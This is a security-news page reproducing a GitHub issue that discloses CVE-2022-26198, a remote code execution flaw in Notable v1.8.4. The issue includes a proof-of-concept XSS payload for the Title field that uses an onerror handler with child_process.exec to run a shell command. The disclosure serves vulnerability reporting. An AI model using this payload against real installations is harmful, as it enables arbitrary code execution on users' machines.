Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-26198: RCE Vulnerability in Notable · Issue #1595 · notable/notable

Notable v1.8.4 does not filter text editing, allowing attackers to execute arbitrary code via a crafted payload injected into the Title text field.

CVE
#vulnerability#ios#git

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Comments

@Passenger-AMao

author: AMao@Hillstone
Date: 2022-02-22

Text editing without filtering leads to arbitrary code execution

Payload:

<img src=# onerror="require('child_process').exec('whoami',(error, stdout, stderr)=>{
  alert(`stdout: ${stdout}`);
});">

eg.

image

@fabiospampinato

2 participants

@fabiospampinato@Passenger-AMao

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda